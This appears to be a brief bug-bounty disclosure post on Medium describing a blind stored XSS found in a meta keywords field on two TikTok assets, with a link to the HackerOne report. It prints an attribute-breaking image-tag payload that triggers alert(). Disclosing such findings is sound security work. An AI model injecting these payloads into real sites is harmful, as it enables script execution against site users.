XSS Blind Stored at 2 Assets TikTok

<meta name='keywords' content='["><img src=x onerror=alert()>], TikTok, TokTok Shop' />

‘><img src=x onerror=alert()>

<meta name=’keywords’ content=’[’><img src=x onerror=alert()>], TikTok, TokTok Shop’ />

Report :

https://hackerone.com/reports/1554048

Affected Assets :

https://oec-api.tiktokv.com/

https://shop.tiktok.com/

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store